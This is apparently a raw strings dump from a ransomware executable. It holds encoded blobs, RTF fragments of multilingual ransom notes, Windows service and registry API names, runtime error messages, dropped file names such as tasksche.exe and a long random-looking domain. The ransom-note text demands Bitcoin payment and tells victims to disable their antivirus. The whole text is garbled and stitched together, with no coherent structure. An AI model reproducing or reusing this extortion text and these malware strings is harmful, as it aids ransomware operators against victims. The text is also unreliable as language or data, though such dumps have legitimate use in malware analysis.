mu8ZiCou+4Y9PFE2Aq/JP73dKOewZib9zIPfPrjyONiobPbo1bCl/m+TSdhqUh5FYmcxDK9ISe0ElEdgkTOm6Nix8wvPsODOynqdIeS4JkPGwOBxnp678RIFb24/AnQdHhRFPOl2CEJKX+CH1pmztWjhR+6blLrvP/+UKFwewIrG58534tZfUzl2UQtv7ezYAPP3C0vvWzfSfUJpDPOpgbVTvJyI+3r/g0FhmSJaSIWIKiOIh245BAVrrJ/ZkjMSbu57KCiySaIJdi2+ltpquy0TFCfM2kcGju1SPq3SFDLSN/E3I8TO7WWeIA3Qntm5VqlK2bs8zoaIVgcF4tWs3xpdavYegL1N/96CZdqaJMKfY76tApl6VdxB/vvqc+X2l2uqGAPDpefagUipGU/dpIuJBTMluL5OnrYTs3PqAJpoq0154OyHtwvgrab7nhJFZXa/vl4CnWEXhQ3UUvlQHBhVoqSYRqeE/EKiJjaJtKhL3V+a+PQVniOOylW77dGba3F3h/aQJgZ/7+33utKuh+9eSAJdPZlhNQmncsmObaUJRYxGkYz+ShjASOOqH2ev3aT0Zpx4SvbZBcYF/A1yoX8W7lD0CHMIhogHgmauAu1g1DHViPB+qZgx108f1PxpwfKkG n 7 zile, nu 
ve}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\insrsid8458214\\charrsid12743656 n kh\\'f4\\loch\\f31502 \\hich\\f31502 ng c\\'f2\\loch\\f31502 \\hich\\f31502 n c\\'f3\\loch\\f31502 th}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 n vain Bitcoinissa. Saat lis\\'e4\\loch\\f31502 tietoja napsauttamalla <}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid11698073 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 About}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid5593755\\charrsid11698073 n, haga clic en <}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid16268367 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 About b}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid13056521\\charrsid16268367 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 itcoin>. n, haga clic en <}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid16268367 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 How to buy}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid13056521\\charrsid16268367 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 bitcoins>. NG error nghapus perangkat lunak ini, dan menonaktifkan anti-virus Anda untuk sementara, sampai Anda membayar dan pembayaran akan diproses. 
Jika anti}{\\rtlch\\fcs1 \\af53 \\ltrch\\fcs0 \\fs22\\cf6\\loch\\af31502\\hich\\af31502\\dbch\\af53\\insrsid6386681 -}{\\rtlch\\fcs1 \\af53 
NmGUz934VSfya0P+NEcpH9WLQK6CEABvbM/bWAFUZwefh9JznmLY4vpuh/JmCpwx7CJi49mUSdbhhMCH/ESti9qzmx4Tuo2CZ+AMM8rK5Bdo6NCc9wjjNdjzNhjJffjYYp/RRUbsMUPc1edWttNyoUnzjwXFvRlwAN/j+1N1LA0SQ9J6Dxo10Q3KbvvJs8agu45fXTiJydIoOQqwBTem2k9T9qIMsVIWkuYlvS2+6V1hUkNKs1eyo5DBSCigzapxlzYyALW4Ks3Ro7YRbdpgGhLCTIALxM31kAVqVz6J9qS++VsjESE7yBrrQgSYQgleJBtdCGMDfO3pShQuVoxfsUvl1REfrUZe6qQU/5IWy0lPZEBQDJOr0ZZ+rfuNCVgsLzz4lhCyK/xFAiXSsKAMOjNE+sqUmNIfIgtp3tzCncUsYPtyL7ztMG3zJELQBRd6/vEPkCCSwvGmkcFK1DL4CqiuybgdJ6YEeICcw7tFFkPeAhol18WNXZtCQcSPkT/lJ9bpkmCXAyhw7gEfQC71Gw6tr4NjoH69a1AOhE+Zu3r814pDKkrjF4MtHEqAF/TWTjE6tZMG8V5Yw/Fe4wnhH1RlyklAfkfuzkx5klttyxcdNBAVZKiZ416YGZ2dq2p+L2AyaZsPpASN4dOAvXBdNcfNmjDzw975WQUuZByFsNQ7nItNmYpFiTyOp/GakLLB+nvcvI3BQgjKc8oLtz43SiTX8CtmpeMNumuY2JKG2f9f8vWq0KvW28K5DjXn/RqhDzCk6m4eTkZBv4rBmVJMQNq/KOjTpJ4bpV+ZZWWR3c7XQ5sLbFNqAV1EISLmYPY/N9KSEoEKcFsAfCFyxCS3r2sPsKMIi2VADfa+/Tbcj2FIDva922OMoS7JJrOnw+EwgCny67B7mG/ebip689Jyb3RLoDewJj33Dw9Qa6dfD5lYnN3AySP6wux2wFiKJq11DM2HIJJaRMqWmSs88LYRc1+8PKRiG8wC6+cYn01vyWZnq6aXjJ0VhrHWvcky1SHF o mais acess\\'ed\\loch\\f31502 \\hich\\f31502 veis porque foram criptografados. Talvez voc\\'ea\\loch\\f31502 \\hich\\f31502 esteja ocupado procurando uma maneira de recuperar seus arquivos, mas n\\'e3\\loch\\f31502 \\hich\\f31502 o perca seu tempo. Ningu\\'e9 O que aconteceu com o meu computador? o remova este software e desative seu anti-v\\'ed\\loch\\f31502 rus por\\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 um tempo, at\\'e9\\loch\\f31502 \\hich\\f31502 que voc\\'ea\\loch\\f31502 \\hich\\f31502 pague eo pagamento seja processado. Se o seu anti-v ohjelmaa, ja poista virustentorjastasi hetkeksi, kunnes maksat ja maksut k\\'e4\\loch\\f31502 \\hich\\f31502 sitell\\'e4\\'e4\\loch\\f31502 \\hich\\f31502 n. 
Jos virustorjunta p\\'e4\\loch\\f31502 \\hich\\f31502 ivittyy ja poistaa t\\'e4\\loch\\f31502 \\hich\\f31502 m\\'e4 OpenMutexA OpenServiceA oversubscribed distance tree oversubscribed dynamic bit lengths tree oversubscribed literal/length tree p v\\'e0\\loch\\f31502 o . p9ifjaposdfjhgosurijfaewrwergwea.com PA^A]A\\_^][ 
PL9zAK5NdhB4pOxeH8C6IohsXLci5GzTlw3tp9N2wz57T3XWRjWfdhbqofZKzImY1KhxBRkSheiKSXoVfc+ZaXYL086Nuw3lltVnTCIsKKNipwkSM/vhd+mHT4gjeUvPEky3LB0Yi5Wjp0t2It2PyrnnzZsgKGv+luka6VN3wGGSMny+pJ0Mfyb7lXOAYF5Ocw59cWHGpEMNXHgeZGZcVXzvFKDcv6ihGeWm6Zb1dQuWkaZ9Qctn+1WEOkypSTCFbowm0+O5hVCkkGNP4P38AMA0C99BNh2QG8tyT7zSOSOc+URvdzQzyxwVtTSDgTz9eTkT4JJM4WJwa1DZLuZ/nPzmlZPYcZINLfecS5+wFVGWzys43dW3lDNYmsNIlRdH7nR3SGTXwUwsgAbOeK8MlXdFCM5Eaui8RybwHSOcE+/hutA6XFT6Aerr1rcEnOrGccXjpe5VlYBzdZv7janZ2d7k8DKIUfKrfL0Q02s4KYBrClScqHuKD+nZiAGlUF3LdVdAbKlbY0B0Of/7J6XTHXiX117oSxucY8LkL6kjuxNdUwYJwuBESmeb3FdNRtgbwvT9SHDJjqwnsYiSBgkXLG5yOwMoa9xMbTaxq6jScOR81odD7ClAylSXnuUCHbUdpyTb0cZR4Z/MnoJeyB8FmnDVicluS9fCXLtEX4BPaGEeUu8PxjEfvztqGOTvRbZqgSHUZB94hRCRtrH6HtUDPxM/iwwByADEGgeM84KLSpHzDSs5wZe2aBWnZGndNgClZmvhUvJSJ1F+MfK40MCoM1fP2TYL6iAA/NjQqFHG7TDnejw5sUnXDDfLCpD/HcKPvroPsC9qrigimwlEn4KLtEI3Ic0xpDeDiHwnOpJKWtxnz46IKnjadOn8Rwnwx9sW3wumyAzORT9pSht+NJEfVqSofR2msfVBk/nwjbPpXc9cw3Cj20My4iHG9G4ARN1GqwO2xH8vQDaUsn7Qw5fT2aY5JJdMz2vPXMYKI8QNhVbo+xa6vj7fod/QHKmKUhGD plik\\'f3\\loch\\f31528 \\hich\\f31528 w, nawet je\\'9c\\loch\\f31528 \\hich\\f31528 li zap\\'b3\\loch\\f31528 acisz! pode recuperar todos os seus arquivos de forma segura e f\\'e1\\loch\\f31502 \\hich\\f31502 cil. Mas voc\\'ea\\loch\\f31502 \\hich\\f31502 n\\'e3\\loch\\f31502 o tem tempo suficiente. 
PrivateKeyLifetimeSeconds PrivKeyCacheMaxItems PrivKeyCachePurgeIntervalSeconds ProductVersion ProviderInfo ProxyHttp1.1 pute}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 Q7Tiq3vWg/yDQJrQN7C78XxHjdj58F2uaFhwrCJlFvfrtFRyMCkWmBflzhlnYRV6DvuQWcY7ktqwx8IfGucaKRrOyaw+HkZB3Vh8AMTe7FZXivmH84ny511JTf+bNSUsDzg6qLaSq/YJIY8vF+4M98xSXQrq7mfrYY95qEsqRvq7FTHWHvU8piO4vNBICvSs217Xs2UW/q4gQzhK6L3pV4YKkOnaNFoSFl7KnKnQDr5nvFGG7OxkfVJlJLcVTB0DYzC9/9pqnJWwTZBXrPtE/mcD5t6FANtxocMpjNnyHsvcTyAGAP6R+B+eR+qZiEZIXUPFaKGMUxvGy8OsF5tPZDePG1hYGF0+AtOdLXMAuN5uTdADW3lhmI2rHdv Qu'est-ce qui s'est pass\\'e9\\loch\\f31502 avec mon ordinateur? r mer information, klicka p\\'e5\\loch\\f31502 <}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid13779469 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 How to buy }{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid15532574\\charrsid13779469 r programvaran och inaktiverar ditt antivirusprogram ett tag tills du betalar och betalningen behandlas. O\\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 R.@@- R6002- floating point support not loaded R6017- unexpected multithread lock error R6018- unexpected heap error R6032- not enough space for locale information R6033- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. 
r7J5aeRrLmBr/hb9bYEXZm021DpdeTNoOYYvv0T+lNQjdiR7LkNN0FqZ2Qzqw65gTEL0H7NFit4KrHRg2HN4SahBmrhvWBjV/yKYK0wmglNwlk3r0PAct+NWmZF9JagZE2BiHbiBBlEI29F/UN75bXD9l1Q/0Kcz/Uzh/MvveVF258rAjFInwG8ZqxCM0MpoC5PWOaW1RmLjnuhMd74K8xACxh2hsIyPd7kVjMwf8UmA5w0+lN9bWPytL5XZQURL/A2sPZc6I7FterYn/pBL8H1O61MDngY0GkuVTzuVx7mTX+Ccrds2xTkQwaogLGN+0+i3/YIs8EYnxOt7l1NDuZABViyeCEGb/luBxbAnQSnGpRwJvrmoY8toD09ukeWgjCJ2Ai8ExtpIChU2sNx85eQThEAoN0zmSyg9o30K4Tsov1ZTIp/X95Se8KnwQi9dR3QYKc8yBBSm8kVJ6GGpKQNWQ6P8c+jFICxRXCr61hUCrp7l3wPkNw013Rl5fmPpPiQo6CeAMsuJNiwYxfPyi07CMqjnVLoeG6OOTWljvz8y+FTfVZCZBsFBDF9466IHD5vRZFXNyMK9f8lBAf/FKP5U2etKvFr+y0UzeQ50K1VhCDWxQIyPi78hG4ytDPs/1abcyyE+Zz82FmWbwA6SnUjO/25jXVospykFgiPFrDMiCFBF0uut8WqNe7+7HmU8v+Ig4F+1eQ9MSR7WXiFiZXWHXj1crLYpGpFd95oYovDOvw+yWgkxqIT+R6V2F+o5RYMdg9YCMTgtiyu70wCgucw9RU1kqGkiYCOkKL0aWDOzuBO5S5CkTYAJdzE+W5XDCgX6cpWGhJ0FasNnH3NAfjYI0LszwpEDu98OBY+zmtTlZtC3oPFMWAC/Z0AlaKppAPj9wC+wTUvHaYebKOjTujZqL+ysbIsiANOz9as1cnBUVVGzas9ZZKOX83TZfRF3UTrZM1UxnxEDg+3tUKdUvZGixYunoOnldp/9oFIHacUCtHo6CGE6jgS0iRgbi3Y RegCloseKey RegCreateKeyW RegisterAdapterName RegisterPrimaryName RegisterReverseLookup RegisterServiceCtrlHandlerA RegisterWanAdapters RegistrationEnabled RegistrationMaxAddressCount RegistrationOverwrite RegistrationRefreshInterval RegistrationTtl RegQueryValueExA RegSetValueExA RemoteRpcDll rer vos fichiers sans notre service de d\\'e9\\loch\\f31502 cryptage. 
ResolverRegistration ResolverRegistrationOnly Rp/ovZWeh65j6G5mVS3o3Ux5cH2pfT/VZm8xsBsr1o2YKlVmsY6mPAOnlmaEwFLrPTm5WIYnd0yOc3abTlt6R1RfwenXgqn5K1K6Uq5o7T+KblzWV1TXo0zTIBD/CwnKbkITPd7GkK+fG/pVTIAGxuI84OwkE6U9/WO3niv3bgLtebI/5Oj2ESIrNTwBRdIGzDYcK1VTlSYl0RMsMMZvWqZAhNBs9xfpyBgzAn+5NpIUwKnm6HS2UbNab6SQIQF53r0+Rx8w7xZkOEayDuGvPQ32Y7zfHtM8o8wsNxWPtI1zCcMUyHPA3zAeGkKIy51j911mdZeLmlXULTazhCdl+lYNd6aoUthPLUew6ng+vSLSxqF1N7+/bFkcWd5vuCPigEKxEg+X3d+JviOJaI9GJ2HWIT8ehFzv6JP7ymkH0XaHYKIXXDbGpMhJWmZzOd+KeEt4MY6Be95bnyjLPxR8Htcc2E35+8q074yiBdThfaOMI18K65supem5lEgTe2lQdQurhhNhgbmYPpmWsSerB8R4CiDHQg6B1xxN9lpUnCWCn37Ib9vdQ2V90almoOSh5FfBxJiPIERqxvWkHqv3h/c0c8MZ3kLJi/+5PD+F/rT0hmgD1lUoqZ9KfEAB/ivMQzIbMnhoJ6DpDZwXvWgYON+Ti4Of8cD3JVZFHKCPtFO1LWNuXu9DHS0cChPvbPTNgL1fuz3hWniAOjJxyXhilxEmUKoCuaHrjL7/mCwA8mUTF8nZfDOYFw/CN4ol8UuKSKKNotx6s4EGyOXAGxRTqQw5Rqr70SWFUVy18EO3TCMj/3eC7HjDV7CAh6+160YbDs53m7AehAx+OlUNq01wPuaxFfSqlgcUG+9Rn1b/Xp1jvWeSkCNdYiiiXi1XwsMrdhKZGKroSXSSJclExe6ZgcNNPa/HgjvXbwtmRkgiGneql4mBYmKDzcXCkp/tjnL6/KriY81gMHN4G9ulMunxVyF8wybDcifTOxtarjLXVRuC1Y7vzYaEuHT RtlLookupFunctionEntry runtime error Runtime Error!Program: s=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0""> Windows 10 --> Windows 8.1 --> Windows Vista --> Wind saatavilla, koska ne on salattu. Ehk\\'e4\\loch\\f31502 \\hich\\f31502 olet kiireinen etsim\\'e4\\loch\\f31502 \\hich\\f31502 ss\\'e4\\loch\\f31502 \\hich\\f31502 tapaa palauttaa tiedostot, mutta \\'e4\\loch\\f31502 \\hich\\f31502 l\\'e4\\loch\\f31502 sactiver votre antivirus pendant un certain temps, jusqu'\\'e0\\loch\\f31502 \\hich\\f31502 ce que vous payiez et que le paiement soit trait\\'e9\\loch\\f31502 \\hich\\f31502 . 
Si votre antivirus est mis \\'e0\\loch\\f31502 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 SafeProcessSearchMode ScreenBadTlds ScreenDefaultServers ScreenUnreachableServers ServerInfoTimeout SetLastError SetServiceStatus ShareCredsWithWinHttp ShowDebugInfo SING error sKlnEmxmYyW/B+f07u7vY4hxNJGm3Gu9hyrHlARgp+RFNrPY3+FH2SrjBorHTmAHH5uBWqLB+vs62FVUsksvz7nNEhN5gTNwDhtJMPBi/gDwjDFjoJMQl2Fuo+rpMLohcq9EXR8VRmC2Dk3EG/6asJPMHw6PA5YQnQwjBcXN8NnWLXF21U1o19hvT2aqVK3O2GTAHGw2GlHOx4Huqs5wJormMLMnQL4KZVFFQw8JQgtzE7FGc6H1s559iWxl4QpGdXG8IvKuG2XCWhypS5/EDGfvobW88NxRgKNgxzJvPxgGqXuAHC1Nx5odryWBo8HfgVu7MS6v+XOG3PK9hEpgUvQwP3FmHMfnH99sM4XkA2gK+N3ioik86apZfP65d4mhiE1RYpAbAgQWcuz594bVvlLNKomTkvVejIAWcy/JWuiVU5jP8PE9hQJPfcOGBQD+DoA9VFs0kUvH90JFx4Q4SfuX/+rEyifA5VENTsXGS0XgLl6HVg0EU3sa5NN2hd5Ev8voAaRllTHgk775Kp5IUoyXs/jzMrw8vHfDMoZ8XjJFkBnoF0T6PgUTBLIL9JDfUwjM7zSMl0bIHTM/hiZ2badmPTCNIUCLthvcx5PlHTRiqyMZC5QWWfpH+xX556YxBXo5Sx2AquOpFDRMILhGzY5LNvzoJAstoFN7MjKsUyVBxUf9jb24jcLDZccxhQ65FkY/lpPmnhnf3UHIwUNXLXXdEYJMmhmxUytnnTUr8JW+AIuIF28OZCI80ojt2HTgtI6sAmpu4ch2cXmxtdo95NmSwWfYQSz3g/mEtmhfBh+vFHH6ldMXbGJ6kifw5GuvZG5Fu8ymx7LCpV5pKNmf79o2vqKDMukS/3dgrlDNQm9urRgI/1JcZvNv+aZOxPyWT1gAkWGk7sGIm+5xHr/U3zduC8XzrQ7vtjOZLIQ/HOvJcTNSRKuHQBIxFVkahu4TZ2efVXgnl1MgrsPn6kmBEoGOXx/kXXCD0n2wzLdKuFj00MhJ+LyFngnTuVO0fDH SqmHttpStreamRandomUploadPoolSize SQMServiceList StartServiceA StartServiceCtrlDispatcherA StoresServiceClassInfo stream error StringFileInfo SupportedNameSpace t th\\'ea\\loch\\f31502 \\hich\\f31502 m th\\'f4\\loch\\f31502 \\hich\\f31502 ng tin, h\\'e3\\loch\\f31502 y nh}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 
T4SmzfidGCQHPD6qoQ41LMIIyKFqGsWQuDEw4x/9j8jbUm+8ebrYp2a8XGY1h3pcYKAJ7f3a9sPB+JClqIxuvgqhAdCRCP8EPv5BUf/J/+cAGOjPGH9gXCt7FLR2dzRKeifi7JYxE7oc59F/F8Ae1JRmtpHs6f51IDyVpfsjE1SawOQqp9nIHYATMvweswNcT2KqpIFv9fXpa73tIHjk79D2iLhTA2H1QQ+M7efNNSo8jBT0FT6QlAeR0QHpgw05kMwn+piSxVO9IQZq8EQcNMLJXYw6oQqUIb/GBhyihI0vXCC7N61F4/m7fLGIAtSC9ubh3Cz82cIdoS7QPlQkUXVTqsrlM2wUofC3lB3vn8dLi7BNhHu5o3coXmV taskdl.exe tasksche.exe taskse.exe ted multithread lock error TerminateProcess ThemeApiConnectionRequest tivirus durante un tiempo, hasta que pague y se procese el pago. Si su antivirus se actualiza y elimina este software autom\\'e1\\loch\\f31502 \\hich\\f31502 ticamente, \\'a1\\loch\\f31502 \\hich\\f31502 no podr\\'e1\\loch\\f31502 recuperar sus archivos aunque pague! TLOSS error tMuXPnM2lOhFzai4FY2YFzQVT2ria1Uza4FKWrOniTXcWRUWKMyhmglP4S1yOtRjD9LEPTOhOeF85DFOtJPRVbIPl8QOjm2IE1rwQt4AbVR2o6YK5pUGXNLCZxXroI8l+mQX3gudA56Bcb/I7hfyeWZy5zaWa5BRrI1Ss+7D3v9knvDj8unV3n9SFY4n/tSxMhRPAF5WlNnTyXmwiWu37r8oWJHCv737uO8horQjTprukSyUEhfRPTnFAkNas3f2Dkf4scXeay8Xl0m5BBeCF2Uum25+98WKvjt988Fllxah/9ENvZyO0XLAJ2RFRcdZhEsXvJP+6RvXTR+zTStn+833TmvQZogXeY5NK9mXw8epopDiwcnR1b0KYlW tpGFEoLOU6+5I78Toh/nHs/RAP9hEBCUwomRSGo1vCW56cdv5jmzDewU9q/N3PW6jOcOEZ4dhezt7ITi/4qY0YNQ08Qf1F9RI+GZ8kI0J3zmHQxLBfQiqokzHPAElkYH/CT6t9y3/M3KUqbdlcBo1aHkieZ1CaGz42D/4WCDVZ Transports TSAppCompat 
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 unexpected heap error unknown compression method urvallisesti ja helposti. Mutta sinulla ei ole tarpeeksi aikaa. 
UseCompartments UseNewRegistration VarFileInfo Version vgLv/4CGSWX5CdAY5bVOmiK3URqJGG6MCpTC5MBP8V6IrNOldfEQVMiQQBV0YOvd9UJG/o2DBKOdevpotJOuju2dkTBfStGf0T9V2v763rEQ2Fr8OVR7cGy9e26kP6k1WZJ3F4nBoZc3Oyzavsxmq1paVdYOaRvd0zdjXBCkXrw0oR2vL6QapaV0X7+OBw/jxeTZaj0+joCVdFY5a7G3sJGbn43UA2bwLMyAJSw/LvYI1T7LYM30eQPcikfYEIz63QNgc9c3JX5OEh8sCWMAJlduF/JTWsj4fTSH/aJQDkv0ZJr8cgFe+62RiZI0whnXF1AhBkdoOGbaxwA8BeHxaDX296Z0Tqg8BZXLyw1jS7ZhANKqYFjG/XIT1/p VS_VERSION_INFO WaitForNameErrorOnAll WarnAlwaysOnPost WarnOnHTTPSToHTTPRedirect WarnOnPost WarnOnPostRedirect Windows 7 --> Windows 8 --> WinSock 2.0 Provider ID WinSock_Registry_Version WpadSearchAllDomains wPJm8PHqMWeiS36sgIuXwIS2D3xaSSlUbYUzVS7h3iF/FEtIGFlsdVBA90zAsqPglb86BtpVCgPsLoNhqtPT4pMxYeNUqQhw312pLqBG/qqW3e+kFyO9D7+WLBgPEaw/ua2z72R0zAqdO1Q4+Iq8JtmR9nSf+TIpzZMEy/QUC2qk2gN8Pv2a3yApVermnX+oTJBYt8Zt/Sd57YsbJtgCprWZz19Lb93RCf2FepoJOJf0u8NhRW+xKJ6mYIf1EjlqnMtfPC8D51UpfJA+xW/YYM1ET+P8iOqpvBhNWiIk6sPpIxCS9k2AwwRrNr0CIplCf/CCYV0Ap+Xn0+CYWkemQlU5UB0PFmg4N5KJj3UpjXMDnbSHpYCCVUZ4NEFJif2eYfysJJLV+QM1XB0fchTLZFcPF1HDyLTWfLjHCelO+bJyn16nVXyT3VF0yN9DUyXpNsZd6JCYNvVQFzn0zf1Jwbddxwd//XFWt7QKHuBu84cg8OuUrxytaqsKPQDAG9t+uMZ9QggsBc+poxiHYXZmrrpHFu5+GLIeBkGx37TJNU2DG9YhNfHvV76qMrymmRfPsQBgpyhXZZFNzzTyj/MTfyFhrdaC6Xj7ASE7w6milmSvbmVv75dDj2zT+GmgBzhrfgTMxll2i7ctB2sVc2wKuTX7vm3C/du/8wR47GTwUYi2I2Y617mkmI6CzfLy7DNWtq5eoj3dNiSZv3r8KjRictDai/CGIslGIBuNF2ydmcBQFJOM9E+MFTI456aWX8H5vFKz7oBxF8Krxc6GeJpFarQSpdcR6iHxv6wDFtzklyQ6kaKf/xo6MDNe222FfAhA9rMC72g0uoufIDhQVj8gkSrMj55aoux3jPMR0mDiRVez2Up0D/IZyk1R/+ONQPx6nmlgGueS8pIIY32+qtay3q9xJhwZzUSrkbw2zHmphQkqH1K69fVkELg5JfEoYLAS+snbTlJm8oqjnlWNeNGJSjXlrDNwa1Ypf9kCGUqT6kTkvvOwuzW+aFkZ720J923 wszystkie pliki bezpiecznie i \\'b3\\loch\\f31528 atwo}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid11827162\\charrsid10775863 
\\hich\\af31502\\dbch\\af31505\\loch\\f31502 . Ale nie masz tyle czasu. www)iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com XA_A^A]A\\^_][ xA_A^A]A\\A[AZAYAX]_^ZY[XeH XUEZWScY9Wd5NxIaAymV7D4nhYxXPgJPYplP/JZLRdRNsF07V9WLht3JteSO2y+ZBce5J9eVRWen7Fyf2PSE0P8C+x5s2jXYRgElfKZEpNmQqKR+3mq80O0/iY1BfcnkOVT4EryG31z26cgh6xnUN9uStuyFWstej8ORiGNY+gy+h9Ma1tbKzaCvubVAwWAbfqzlWJKaHyKsSZT207h0dRNDbrp4uTBoP/LB966BONJNWl+6qmiVJBl7gIEY24zNVSFsVzZCRwz/J3X4PhBfo4fFiQqEDAlwqNdfKuQT+86wYbKCfh6d+eoowVCM20fpL1Ql20GyOlLnxzKto9h8OG0TfHF3ReH8o4ilB6QLiqSCauuitMHUWX0dznaakzpj3WtoX2nZBmh7lvVTTg9RfXNAXOo3/Q0TEUP9xACBl3h1Q+YCtqN2s4O6/Z//XnFQ4VaLhUS2u6nxobFloPVAjbXp7POdoj3lBrxUYoaYqr9btwiNrigI7OKz7d1f0FDY4e4vzjWEJyqzjdBzqrFqw7+FotuAypht8B0Dkm06jgy2dhSd1W+R0TADSowcrOJOuPYm7VtniJEy+Bz/F2czbt881JIA1YhSOijvyUoG9Rt2f+P7/3AhIdBcMW8Bf6m+89BsOMx/VN6XFq93fAQTQGTbhpnoEI2vD0wF1cCkcwsGsgUGkyyxbj3Gq0+5VcXhEYujDvs2WkiFegKTK8w/IUThynLN1O+08NZ5jqKMPw9GYeSGCpGeEv8jENZhKqfV9POm9IVUMCjJNvGXgKbsTMFo3qU8fiiaMzd6zFXT4ow3bcoyeYfkXuiNZQH3ulbB5eVwCWiBuWlGdGKDnCsxGOmymI6ha9OUL/Iyqw8JIjaI